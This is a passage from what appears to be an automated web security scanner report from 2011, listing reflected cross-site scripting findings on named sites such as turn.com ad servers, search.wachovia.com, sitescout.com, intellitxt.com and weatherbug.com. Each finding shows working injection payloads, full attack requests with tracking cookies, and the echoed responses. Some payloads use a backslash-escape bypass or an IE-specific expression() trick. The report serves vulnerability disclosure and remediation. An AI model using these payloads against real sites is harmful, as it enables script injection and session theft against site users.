   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=8310709099384096523&fpid=6506f"><script>alert(1)</script>91c27bc8e67&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.430. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38030"><script>alert(1)</script>3e8a29e1991 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=38030"><script>alert(1)</script>3e8a29e1991&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1; pf=vYlmmNe4wlXMju21sv8E9BbQtqzBjZadwYr3eEaEEdXu2q8_Jo62qDoNU1sRcsTDMLxOqe5U8OfgCnbpqI2ApX4lLZyvKs0UYrWi2iSsDx65o3Pzwoz6403H7SSItm-xFnOkZRhnTAf1OsSeg86x6N9he2SzgZbMiSxi7XoC0oDOTz_hW1W1inw2PPTXkr5M6IAD_gZxI523_TIIsV7tK-AIolHB94EOuCprrHzPsXFXUf33lMkSWcP-I3s4DQm5; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Tue, 02-Aug-2011 19:03:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:02:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=2664611420216086048&fpid=4&nu=n&t=&sp=38030"><script>alert(1)</script>3e8a29e1991&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.431. http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.wachovia.com
Path:   /selfservice/microsites/wachoviaSearchEntry.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aaef9"><script>alert(1)</script>6d3f3e1bc4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selfservice/microsites/wachoviaSearchEntry.do?aaef9"><script>alert(1)</script>6d3f3e1bc4b=1 HTTP/1.1
Host: search.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0E2F343A11D72B8481BC40D2D653F4B5; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Thu, 03 Feb 2011 13:17:41 GMT
Connection: close


<html>
   
   <head>
       <title>KNOVA
   Search Results
</title>
       <meta http-equiv="content-type" content="text/html;c
...[SNIP]...
<TextArea name="aaef9"><script>alert(1)</script>6d3f3e1bc4b" style="display:none;visibility:hide">
...[SNIP]...

4.432. http://smm.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85494'%3balert(1)//dbe71432c4e was submitted in the h parameter. This input was echoed as 85494';alert(1)//dbe71432c4e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=300&h=25085494'%3balert(1)//dbe71432c4e&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:48 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="25085494';alert(1)//dbe71432c4e" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.433. http://smm.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed62"%3balert(1)//eec28b3a643 was submitted in the pid parameter. This input was echoed as aed62";alert(1)//eec28b3a643 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4aed62"%3balert(1)//eec28b3a643&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4aed62";alert(1)//eec28b3a643&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C1220000175%3Bi%3D0%3Bn%3D1220%3B1%3D8%3B2%3D1%3Bs%3D134%3Bg%3D172%3Bm%3D82%3Bw%3D47%3Bi%3D0%3Bu%3DINmz6woB
...[SNIP]...

4.434. http://smm.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smm.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79fda'%3balert(1)//cbed4520d8d was submitted in the w parameter. This input was echoed as 79fda';alert(1)//cbed4520d8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=21818F4&w=30079fda'%3balert(1)//cbed4520d8d&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=885848;x=2304;g=172;c=1220000175,1220000175;i=0;n=1220;1=8;2=1;s=134;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1080864;h=922865;k= HTTP/1.1
Host: smm.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1296748812638&k=banks&l=Dallas%2c+TX&cat=cat%3dfinancial_services&zone=locm.sp%2fretail_banks_15020100
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 650
Date: Thu, 03 Feb 2011 16:23:46 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://smm.sitescout.com/disp?pid=21818F4&cm=http%3A%2F%2Fxads.zedo.com%2Fads2%2Fc%3Fa%3D885848%3Bx%3D2304%3Bg%3D172%3Bc%3D1220000175%2C12
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="30079fda';alert(1)//cbed4520d8d" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.435. http://thestreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1bad9<script>alert(1)</script>6e86ca26221 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /intellitxt/front.asp?ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA6yAEAAAEthmhrrQA-; VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+c+YAA-; Domain=.intellitxt.com; Expires=Mon, 04-Apr-2011 14:22:36 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:36 GMT
Connection: close
Content-Length: 8275

/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
if('undefined'==typeof $iTXT){var $iTXT={};}if('undefined'==typ
...[SNIP]...
ad();}}};function itxtBegin(){
var itxturl='http://thestreet.us.intellitxt.com/v3/door.jsp?ts='+(new Date()).getTime()+'&pagecl='+itxtbtl()+'&enc='+itxtGCE()+'&fv='+gDFVS()+'&muid='+MUID+'&ipid=10685&1bad9<script>alert(1)</script>6e86ca26221=1';
itxturl+='&seid='+gSEID+'&sest='+gSEST;
if ($iTXT && $iTXT.js && $iTXT.js.ready) {$iTXT.js.load(itxturl);
} else if ($iTXT && $iTXT.js) {$iTXT.js.onload = function() {
$iTXT.js.load(itxturl);
...[SNIP]...

4.436. http://thestreet.us.intellitxt.com/v3/door.jsp [sest parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thestreet.us.intellitxt.com
Path:   /v3/door.jsp

Issue detail

The value of the sest request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbce3\'%3balert(1)//470e2868204 was submitted in the sest parameter. This input was echoed as cbce3\\';alert(1)//470e2868204 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /v3/door.jsp?ts=1296742745648&pagecl=2359&enc=&fv=101&muid=&ipid=10685&seid=0&sest=cbce3\'%3balert(1)//470e2868204 HTTP/1.1
Host: thestreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.thestreet.com/story/229c029d89d776ed)(sn=*/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AEAAAEt6+LRYAA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 14:22:49 GMT
Connection: close
Content-Length: 10430


/* This source code is Copyright (c) Vibrant Media 2001-2011 and forms part of the patented Vibrant Media product "IntelliTXT" (sm). */
try{if('undefined'==typeof $iTXT){var $iTXT={};}$iTXT.door={}
...[SNIP]...
omponent(tTXT.replace(/\n/,' ')); while (p.ttxt.indexOf('\'')>-1) p.ttxt=p.ttxt.replace('\'', '%27');p.auat=0;p.lpgv=0;p.ddate=dDate;p.pvu=gPVU;p.pvm=gPVM;p.forcedb=0;p.seid=gSEID;p.unrm=false;p.sest='cbce3\\';alert(1)//470e2868204';p.ru=encodeURIComponent(sRU);cAs(server,p);} else if (gCL){if(((gITXTN!=null&&gITXTN.length)||(gITXTNi!=null&&gITXTNi.length))&&gCL>
...[SNIP]...

4.437. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 531ee"%3balert(1)//40807062aa8 was submitted in the zcode parameter. This input was echoed as 531ee";alert(1)//40807062aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?zip=75201&zcode=6292531ee"%3balert(1)//40807062aa8 HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 100657
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:53 GMT
Connection: close


                                                                                   
...[SNIP]...
<script type="text/javascript">
   var feedbackURL = "http://weather.weatherbug.com/feedback-form.html?zcode=6292531ee";alert(1)//40807062aa8&region=8&region_name=North America&country=US&country_name=USA&state_code=TX&state_name=Texas&zip=75201&city_name=Dallas&stat=DALS1";
</script>
...[SNIP]...

4.438. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc was submitted in the zcode parameter. This input was echoed as 3b886"style="x:expression(alert(1))"e0fb95ae5dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?zip=75201&zcode=62923b886"style%3d"x%3aexpression(alert(1))"e0fb95ae5dc HTTP/1.1
Host: weather.weatherbug.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Length: 104331
Content-Type: text/html; charset=utf-8
Set-Cookie: wxbug_cookie1=lang_id=en-US&units=0&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
p3p: CP="NON DSP COR NID"
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: max-age=2700
Date: Thu, 03 Feb 2011 16:34:36 GMT
Connection: close


                                                                                   
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="All WeatherBug feeds" href="http://feeds.weatherbug.com/rss.aspx?zipCode=75201&zCode=62923b886"style="x:expression(alert(1))"e0fb95ae5dc&units=0&feed=curr,fcst,cpht,news" />
...[SNIP]...

4.439. http://weather.weatherbug.com/ [zcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://weather.weatherbug.com
Path:   /

Issue detail

The value of the zcode request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c92\'%3balert(1)//fb3d6162354 was submitted in the zcode parameter. This input was echoed as b8c92\\';alert(1)//fb3d6162354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

